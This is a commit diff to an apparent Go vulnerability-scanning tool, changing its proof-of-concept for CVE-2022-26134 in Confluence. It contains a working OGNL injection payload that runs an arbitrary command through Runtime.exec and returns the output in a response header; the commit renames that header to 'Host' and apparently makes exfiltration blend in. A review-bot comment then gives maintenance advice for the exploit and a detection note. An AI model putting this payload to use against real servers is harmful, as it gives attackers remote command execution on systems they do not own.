
Commit 3019c68

committed
🪂 修改CVE-2022-26134的Response头为Host
1 parent 48d898d commit 3019c68


1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

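--- a/cmd/commons/poc/2022/CVE-2022-26134.go
+++ b/cmd/commons/poc/2022/CVE-2022-26134.go
@@ -35,7 +35,7 @@ func (t CVE202226134) SendPoc(target string, hashmap map[string]interface{}) {
 }
 cmd = th
 }
-payload := fmt.Sprintf("${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(\"%s\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}", cmd)
+payload := fmt.Sprintf("${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(\"%s\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"Host\",#a))}", cmd)
 payload, _ = req2.Encode(payload, "utf8")
 target1 := target + payload + "/"
 
@@ -44,7 +44,7 @@ func (t CVE202226134) SendPoc(target string, hashmap map[string]interface{}) {
 
 resp := utils.Send(reqmap)
 
-res := resp2.HandlerRespHeader(resp, "X-Cmd-Response")
+res := resp2.HandlerRespHeader(resp, "Host")
 if t.CheckExp(resp, target1, hashmap) {
 if res != "" {
 //res = utils.DecodeBase64String(res)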
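Review bot: The header name `Host` is now a bare literal in two places, inside the payload string on new line 38 and in the `HandlerRespHeader` call on new line 47, and the two must agree for `res` to be filled in. If they drift apart, `res` would presumably stay empty and a vulnerable host would go unreported; defining the name once, e.g. `const respHeader = "Host"`, and using it at both sites avoids that. The commit gives no reason for the rename, so a comment above line 47 such as `// response header carrying the check output; must match the name embedded in the payload` would help the next maintainer. For anyone maintaining detections, note that `Host` is a request header and is not expected in an HTTP response, so response-side rules keyed only on `X-Cmd-Response` should also treat a `Host` response header as anomalous. SendPoc's body starts and ends outside both hunks.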
